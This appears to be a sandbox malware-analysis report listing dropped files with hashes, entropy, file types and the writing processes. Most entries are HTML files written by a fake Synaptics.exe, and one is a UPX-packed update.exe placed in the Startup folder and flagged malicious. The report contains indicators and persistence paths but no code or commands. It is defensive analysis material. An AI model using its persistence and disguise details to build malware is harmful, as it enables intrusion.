                                                                                                                                                      SHA1:FE76733C43A0D238394E0968C18BB97CB5A327C3
                                                                                                                                                      SHA-256:7122CBE851399B04FA2430DC6FA3EF2B9EFA0838C6C910EA6309270DF6A65BB9
                                                                                                                                                      SHA-512:A50B4CBB9AF77006F1F68BB1503A2A533FB64FE575C2183A71194790E017C571086DCB1F839B77817E3456323488F27ABD57DAB829CD30F8C908F5898ED32B92
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.261966481856597
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0ySU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+F+pAZewRDK4mW
                                                                                                                                                      MD5:341DE5AEC3A525C3429B78209F1D5DD9
                                                                                                                                                      SHA1:A3BF0AAEFD0869AFCB82CD4C1A6EC92042928CBC
                                                                                                                                                      SHA-256:C4CDD2137FD9CEA2BFE6AA7F66D39E60ACB9D5DE676B018C3F71AD5A196AD41C
                                                                                                                                                      SHA-512:E5EC4CAD58FA4BB8C5092D95B3DD89666BDFC83256B87CF332BC709B537A7457ED77C6E96E3B400F2052E1C323CD7294E26566EC782C12DF449F3B1880869E4E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.265002972678917
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0rSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+E+pAZewRDK4mW
                                                                                                                                                      MD5:4F7984AB3365AAC6F2B4099A1AB3A5D2
                                                                                                                                                      SHA1:FC87D8F4B4806AFC8A565F9EE56E42A0C1703DCE
                                                                                                                                                      SHA-256:AB028CBCA23BFD469ACC16E55B83DEBAB07F3B883B022428AD6F4EFCFB1D52C2
                                                                                                                                                      SHA-512:100074B1E0D3B6389A51A605F0E6ECCEBF7F9DCCC30551FE147EF40A9262E0183B456B83FB2C6A6D6DF503D8C17CBBB424596E1DAAB4C07C5F905850E57B694C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.266245263268218
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0Lh5SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+a5+pAZewRDK4mW
                                                                                                                                                      MD5:F14DE6D0ABF3300CE6E937560139321B
                                                                                                                                                      SHA1:3A6E606B8ECED31EA7935F1E0B5F1CF2D035AF50
                                                                                                                                                      SHA-256:B5B9A3644416FF3F678A4A5D31DA6E94E1DE95912E717DAA2432A5DA3BE61FF6
                                                                                                                                                      SHA-512:F3EDD290047EFF6EA276B7A2D5E6EE459B3A6E3DA3C55698301907700CE1F1C79E513CF9F0F827696353D61E33394B0BDEFC4A8A72543BAA8C11B39C213B5626
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.255469822975438
                                                                                                                                                      Encrypted:false
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.269393246642785
                                                                                                                                                      Encrypted:false
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.276795087454647
                                                                                                                                                      Encrypted:false
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2621555942790685
                                                                                                                                                      Encrypted:false
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.252379309720784
                                                                                                                                                      Encrypted:false
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2567700410909035
                                                                                                                                                      Encrypted:false
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.272758135258359
                                                                                                                                                      Encrypted:false
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.257771324811607
                                                                                                                                                      Encrypted:false
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.246584371161457
                                                                                                                                                      Encrypted:false
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.256657188390123
                                                                                                                                                      Encrypted:false
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2813278631420095
                                                                                                                                                      Encrypted:false
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2683054930735205
                                                                                                                                                      Encrypted:false
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.241812556524698
                                                                                                                                                      Encrypted:false
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.247214957520749
                                                                                                                                                      Encrypted:false
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.274929752388672
                                                                                                                                                      Encrypted:false
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.265647799970668
                                                                                                                                                      Encrypted:false
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.261348496706126
                                                                                                                                                      Encrypted:false
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2792476598843585
                                                                                                                                                      Encrypted:false
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.266643483013398
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0HSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                                                                                      MD5:BAECBEEE8206149BD6E6B652D3D358A0
                                                                                                                                                      SHA1:CCE6C65D696B6A6EC55EBF047F093757D2D6E6FF
                                                                                                                                                      SHA-256:87800AEB58E1F5F1AA774E03CFD0F324D9D99C6251ACFE7EE306ADF70208E7A3
                                                                                                                                                      SHA-512:39F136B9117235C7BBAA5FD0175A46E2533F1CA40933C8BCF17A9D24D7E8FDB135B3F8910807BB8E2C4930E87F6986629EB613FB3A18BEBFDF8BA80D2205A2C3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.260134997832926
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0VWSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+KW+pAZewRDK4mW
                                                                                                                                                      MD5:4AE06D89028DDAD6F13BCD658F8F15EE
                                                                                                                                                      SHA1:75ABD5012869974513C71AD2D1521DBE22EA8283
                                                                                                                                                      SHA-256:06B0E3CCDF084C05606C981A8A0CD4B3982BD6BB27AE3714AC90DBDD9A479836
                                                                                                                                                      SHA-512:18E1AFBFA9FB88400B92A9F6D20D08D515FFCB44B41E441EED92D23210FB5A54C797E19282ACBB39C56439B069B3CFBD92BED99BA48A9C6F4631728243C37FBC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.269813993210103
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0hISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+R+pAZewRDK4mW
                                                                                                                                                      MD5:BA3C85EB3F2B13F64602EC06779EABA6
                                                                                                                                                      SHA1:6F592600D1C91CD85CA63FB58EEBDACCEE14BD40
                                                                                                                                                      SHA-256:E0928979FEB36976DCEDDC1570237D68677C687991DB1BFF1328666E44BB5F54
                                                                                                                                                      SHA-512:7DFAAC5647B9CC425FE3532BD8AD04D4415BAB508CE0E3DD4EE756953F67DEE277CB6DC343629F6D369CB0D9F41CBA7472B9AD4BCDEC678FB7FA642E74BB9E1A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.264403788403859
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+03SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                                                                                      MD5:7DE3F7014B994B2B2487B23476C402CF
                                                                                                                                                      SHA1:55DF203C22F0CF6FCD0B4537F08641E37E16F197
                                                                                                                                                      SHA-256:5173D3021316822D040C372C23AAC77B94DD87BC87051B8DDFCD652C723C2BE8
                                                                                                                                                      SHA-512:F1A065BCAC31705F3329F214BA0A4F5F369495BB5903E2B3DA2ABABCF146553DDB6A8AFD1CC0C61A82044F3E7BA7BF55440BB9652F769B99FD1A73CE1014AFE3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.258866119062151
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0dihgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++i2+pAZewRDK4mW
                                                                                                                                                      MD5:7C5EC07B2654049A826D23EB34AC9974
                                                                                                                                                      SHA1:10834EF578E8D3A23DE82CB652CEABD41F7D9F33
                                                                                                                                                      SHA-256:D7E0F574086DDD8D94C6350DC0A443FD3FAE751BDD02D4306F295D6785E3BABB
                                                                                                                                                      SHA-512:41767065C77E1B13ADC247A3E1DE8F6800D9785BF6B5A0B2A79EF0BC914F68658D9683DAB565DF43FF67A3E9717BCEA183710D445FF12212F72CC7187717930C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2658623621319816
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+08SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                                                                      MD5:85F81811D5EC52C0B92E8670DCD2892A
                                                                                                                                                      SHA1:D93590112069D2C76C43FEE8A2516A602E393DDE
                                                                                                                                                      SHA-256:310EDF685CB22FB15376A2C034269D7B8B50FAB2D8DF87DE9A8AEB1D5EDE1645
                                                                                                                                                      SHA-512:7B393BCA440A91A0193E828AA5DDF629341807A831EBFE0983C0216EB86282530B7212E80B6B5772CD498A4713C830E3C97F12985E038DF1F2AB85F8EFD0C00A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.263877195545431
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0EFDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+vR+pAZewRDK4mW
                                                                                                                                                      MD5:A9894A75B0026FEF17B4C6D46A38A954
                                                                                                                                                      SHA1:5CBAF6E673DF478D1EFE078EFA5B869B7520D042
                                                                                                                                                      SHA-256:8E609927A583E748ADF76FC31A7B47BF13B9EAA4182F1817766B4F3EC43059BB
                                                                                                                                                      SHA-512:45C9317F4C3E66F1374FEEC0D0708039F12014E0068D33041315C6887235E6043FAE13A5FEDCE1F9FFEB4D838CF644E67D7002DD99CA972359B372F311362FC1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.259698752901752
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0+wbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Sb+pAZewRDK4mW
                                                                                                                                                      MD5:C9CA3E4EFA793D9481CB5829BC357BF6
                                                                                                                                                      SHA1:4A4E8969766980FF32E31BD41A4769F4C4CB0861
                                                                                                                                                      SHA-256:1B52327FAB2CD022A0F3BB76DC3A25C8A67A67D02042DFCF935F9D0D17DE825C
                                                                                                                                                      SHA-512:18532208B249247C5BA30B5E5CC4626EAE582D3765D9D4CC79EE27C26D3B624F18D74F634F6A41CAFF4AF34DB44CBEE36B9A93C2A5D006A4326B7E78ABE81326
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.268491781177297
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0YSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X+pAZewRDK4mW
                                                                                                                                                      MD5:A33BB1B6969C11A2F6E8D4699B7E05CE
                                                                                                                                                      SHA1:8BF6D83C371C1CC5062355B178EE99E632BEC3D8
                                                                                                                                                      SHA-256:8F58610246B5FB86089B75314364634A75427EE7F411B83B641B2E4912C352D1
                                                                                                                                                      SHA-512:913FBB1F6D51CAAA451F48482798343D7EE39686B665910338527E4BDAEA9903330CD9592E012636E6F2C2DD8124A917C8A4463C2FF01303039EEEE63F93C61D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.260644988142168
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+07ZDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+WZD+pAZewRDK4mW
                                                                                                                                                      MD5:29BDE675B328C8532164F5BCC764EC08
                                                                                                                                                      SHA1:843D2AB66D8B63081C51E0FD5DDF9C9F319C2E49
                                                                                                                                                      SHA-256:825A41B105B0E13706E2B61A397104D32E5D074573508BB625AF2BD6E5CA9151
                                                                                                                                                      SHA-512:B8355C9070915578B747E2B925DC925E936A463DCE15AB45653AB272D5D128EFC6D2E5DE15A49D9034E3C32A952B45D9655C062F97AE685C9E3E965E0950C904
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.271631658895326
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0jnSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Y+pAZewRDK4mW
                                                                                                                                                      MD5:7B3FD6CCCC392A7FBAB60A3DF0F63848
                                                                                                                                                      SHA1:C8B0E4F6409C18D179A1C32B37E0C60260052104
                                                                                                                                                      SHA-256:13629A6A05E6979576CA465E7302EC6DB6C548F0255C0CECC465121974FB8A62
                                                                                                                                                      SHA-512:929DB0CF94947860868E606BC5B683D71639E5EC863FC6E78F58C1207B7A3ACBC6F7E81D375FCF44EA597190B5C37C3133EBE530471C071CD0DFE814D0101D89
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):18387
                                                                                                                                                      Entropy (8bit):7.523057953697544
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                      MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                      SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                      SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                      SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.266298763619996
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+3+pAZewRDK4mW
                                                                                                                                                      MD5:C8752C998D51F5FD8267829BA97DD0AE
                                                                                                                                                      SHA1:78570883B0B912234C3656C8CA6B61DB1524D416
                                                                                                                                                      SHA-256:207466561FAFBD9DC9CF6585A9552F024CC75046173546BABDDD567E3297CAB2
                                                                                                                                                      SHA-512:1E724874E7334154DCBB664E70CAC4A6AE8269FB6E3E143B26B88D776E63B647F85866D1B1D196F13A1212900054A3ACD0796DB22A9F4103C2BD3F415D8BC0D1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.267551682315597
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0hDcSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+sc+pAZewRDK4mW
                                                                                                                                                      MD5:02AB1BCAF53054E457084C73C9BA76F1
                                                                                                                                                      SHA1:84AA8A95DD78CDFB6373C5EFE09A0B6793B0E456
                                                                                                                                                      SHA-256:043D52787896F34F7EEEF0976D7F21B494EFC00A46A01F054D093F4F03E825FA
                                                                                                                                                      SHA-512:CEBACC862A9A84AD3065A1B6207336D8DA81FC53BD7CBE83DEE963778E8CB332C46B1CDFB92505CA55FD319E372047C4C64BCAE6871110DF91DA4B0AE169629B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):165
                                                                                                                                                      Entropy (8bit):1.7769794087092887
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                                                                                                                                                      MD5:37BD8218D560948827D3B948CAFA579C
                                                                                                                                                      SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                                                                                                                                                      SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                                                                                                                                                      SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):32768
                                                                                                                                                      Entropy (8bit):3.746897789531007
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                                      MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                                      SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                                      SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                                      SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1217536
                                                                                                                                                      Entropy (8bit):6.928149757710278
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:DXe9PPlowWX0t6mOQwg1Qd15CcYk0We15Ue7Okfn0ik9Ya0xMYPLAtF5WyNn2fQ6:qhloDX0XOf44e7JFtxAnWe2fxYBQ
                                                                                                                                                      MD5:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      SHA1:CE7D9083A3A7A5A7F627CF1CDC4946756DF3AAA9
                                                                                                                                                      SHA-256:7DF6C8D2B3479312E1E8BF177D58E7F69C11B932177F288C0FC0D2AEE2F869D7
                                                                                                                                                      SHA-512:A27903F33A6B7B6B003EE5CB80B7FF640EF24D1CA635CE79D15DE94F69E6B2BDC8CA3E6E699F130BBC9E6D629312CC48216624A6110CAA068C532AA9133646E2
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:47:55 2024, mtime=Mon Dec 30 09:47:55 2024, atime=Mon Dec 30 09:47:55 2024, length=1217536, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1817
                                                                                                                                                      Entropy (8bit):3.4563110699752
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:83Jp299veuwfSwdXAyePoE2+s9T4IlwMb+JyJtm:8332911KS9LCr9MIlwJyJt
                                                                                                                                                      MD5:272DE199717A616C13F9AF54F8219599
                                                                                                                                                      SHA1:941E3B90F9BBFEBF08B60D548A275B10B6EE1448
                                                                                                                                                      SHA-256:BA12E3AD7BF1A244DD257BE3B5FE532A0452EB1D922E23F1E34E5D5E5A1E66D0
                                                                                                                                                      SHA-512:6B82449EBBDD675927569BEE975F31B2F82E3762D6EB3BFC3F49A0BDBEAD0526C754C6D0AB922342552302A91D75789CD954237025A56771C949FC22C25E4400
                                                                                                                                                      Malicious:false
